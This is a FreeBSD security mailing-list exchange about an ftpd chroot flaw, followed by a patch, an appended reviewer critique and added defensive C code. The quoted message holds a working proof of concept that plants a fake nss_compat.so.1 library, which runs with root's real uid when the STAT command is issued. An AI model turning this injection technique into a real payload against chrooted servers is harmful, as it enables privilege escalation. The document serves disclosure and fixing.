Date:      Wed, 30 Nov 2011 16:01:10 -0800
From:      Xin LI <delphij@delphij.net>
To:        Przemyslaw Frasunek <przemyslaw@frasunek.com>
Cc:        "freebsd-security@freebsd.org" <freebsd-security@freebsd.org>
Subject:   Re: ftpd security issue ?
Message-ID:  <4ED6C3C6.5030402@delphij.net>
In-Reply-To: <4ED69B7E.50505@frasunek.com>
References:  <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

On 11/30/11 13:09, Przemyslaw Frasunek wrote:
>> Saw this on FD... Anyone know any more details about this ?
>> http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html
>
> This is a well known hazard of chrooting to directories controlled
> by unprivileged users. In this case, vulnerability exists because
> ftpd calls /bin/ls with uid=0 and euid!=0 when STAT command is
> issued, and nss_compat.so is loaded by libc regardless of elevated
> privileges.
> 
> This can be proven by creating dummy ~/lib/nss_compat.so.1:
> 
> [venglin@lagoon ~/lib]$ cat dummy.c
> #include <stdio.h>
> #include <fcntl.h>
> #include <unistd.h>   /* getuid(), geteuid() */
> 
> void _init() {
>     FILE *fp = fopen("asdf", "w+");
>     fprintf(fp, "%d %d\n", getuid(), geteuid());
>     fclose(fp);
> }
> [venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
> [venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles
> [venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1
> 
> And after calling STAT command:
> 
> [venglin@lagoon ~/lib]$ cat ~/asdf
> 0 3000
> 
> BTW. This vulnerability affects only configurations, where
> /etc/ftpchroot exists or anonymous user is allowed to create files
> inside etc and lib dirs.

This doesn't seem to be a typical configuration, or is it?

Will the attached patch fix the problem?

(I think libc should just refuse /etc/nsswitch.conf and libraries if
they are writable by others by the way)

Cheers,
- -- 
Xin LI <delphij@delphij.net>	https://www.delphij.net/
FreeBSD - The Power to Serve!		Live free or die
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.18 (FreeBSD)

iQEcBAEBCAAGBQJO1sPFAAoJEATO+BI/yjfBe+kIANGf3sEKV2iEXnhOEzEJkQFr
qOm5niYdxwrnmQ4tjU19Ny+RZ5C9QyIcsvZeYJHLY3AvHGcxKCDc+BfAqHvBbxqF
JC1/CbdnflUp3VpNnTvXIkN1/upcZXRU9BmVOXHYg7Ycqrqhom7+57hza2zSZxHO
UlKXzLD3O3NIPMgkliJ9YwpsNr4dDrpCItVddWC3yENV33Qc9rOFLMzlwP6qk5Ib
XxzCHqg7nNioKDZ0KUeFsSEtk7xT6l5nmRIGQz+YN4CyLWjuZf5EspZSha5VFwwO
H+VSvl339AMJDRMUa2g4mLbjpHjYyZAPw+fM+SxPuC4Js1MrhkseZLPAQeoaEWg=
=wDbK
-----END PGP SIGNATURE-----

Attachment: popen.diff (text/plain)

Index: libexec/ftpd/popen.c
===================================================================
--- libexec/ftpd/popen.c	(revision 228156)
+++ libexec/ftpd/popen.c	(working copy)
@@ -157,6 +157,7 @@ ftpd_popen(char *program, char *type)
 			}
 			exit(ls_main(gargc, gargv));
 		}
+		setuid(geteuid());
 		execv(gargv[0], gargv);
 		_exit(1);
 	}
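Review bot: the added `setuid(geteuid());` immediately before `execv(gargv[0], gargv);` ignores the return value, so if the call fails the child still execs the external ls with the original real uid, which is exactly the uid=0/euid!=0 state the report describes. Fail closed instead, e.g. `if (setuid(geteuid()) != 0) _exit(1);`. Note also that the new line sits after the `exit(ls_main(gargc, gargv));` branch, so only the execv path is changed by this hunk.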

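The two remedies discussed in this message, dropping the real uid to the effective uid before exec'ing a helper (what the attached patch does, here with the return value checked) and refusing NSS configuration or modules that are writable by others (what Xin LI suggests libc should do), written out as an added example. This is not code from the FreeBSD tree or from the thread; the function names `drop_real_uid_to_effective`, `nss_file_is_trusted` and `run_self_check` are assumptions, and the ownership check takes the expected owner as a parameter so that the self-check can run unprivileged against a constructed temporary file.

```c
#define _XOPEN_SOURCE 700
#include <sys/stat.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Remedy 1 (ftpd side): make the real uid match the effective uid before
 * exec'ing a helper such as /bin/ls, and fail closed if the kernel refuses.
 * Returns 0 on success, -1 if the process still has uid != euid. */
int drop_real_uid_to_effective(void)
{
    uid_t euid = geteuid();

    if (setuid(euid) != 0)          /* an unchecked setuid() is the classic mistake */
        return -1;
    if (getuid() != euid || geteuid() != euid)
        return -1;                  /* verify the result, do not just trust the return code */
    return 0;
}

/* Remedy 2 (libc side, hypothetical): accept an nsswitch.conf or NSS module
 * only if it is a regular file, owned by the expected uid, and not writable by
 * group or others. Returns 1 when the file is acceptable, 0 otherwise. */
int nss_file_is_trusted(const char *path, uid_t expected_owner)
{
    struct stat st;

    if (lstat(path, &st) != 0)
        return 0;                   /* missing or unreadable: reject */
    if (!S_ISREG(st.st_mode))
        return 0;                   /* symlink, directory, device: reject */
    if (st.st_uid != expected_owner)
        return 0;                   /* a chroot'ed user's own ~/lib fails here */
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return 0;                   /* writable by group or others: reject */
    return 1;
}

/* Self-check on a constructed temporary file: returns the number of cases
 * that did not behave as expected (0 means every case passed). */
int run_self_check(void)
{
    char path[] = "/tmp/nss_check_XXXXXX";   /* constructed sample path */
    int failures = 0;
    int fd = mkstemp(path);                 /* created mode 0600, owned by us */

    if (fd < 0)
        return 1;
    if (fchmod(fd, 0644) != 0 || nss_file_is_trusted(path, getuid()) != 1)
        failures++;                 /* owner-writable only: must be accepted */
    if (fchmod(fd, 0666) != 0 || nss_file_is_trusted(path, getuid()) != 0)
        failures++;                 /* world-writable: must be rejected */
    if (fchmod(fd, 0664) != 0 || nss_file_is_trusted(path, getuid()) != 0)
        failures++;                 /* group-writable: must be rejected */
    if (fchmod(fd, 0644) != 0 || nss_file_is_trusted(path, getuid() + 1) != 0)
        failures++;                 /* wrong owner: must be rejected */
    if (nss_file_is_trusted("/nonexistent/nss_compat.so.1", getuid()) != 0)
        failures++;                 /* missing file: must be rejected */
    close(fd);
    unlink(path);
    return failures;
}

int main(void)
{
    printf("uid drop: %s\n", drop_real_uid_to_effective() == 0 ? "ok" : "FAILED");
    printf("file checks: %d failure(s)\n", run_self_check());
    return 0;
}
```

The ownership check is deliberately strict about symlinks and missing files: a loader that falls back to "no module" on error is safer than one that follows whatever the chroot owner placed at that path.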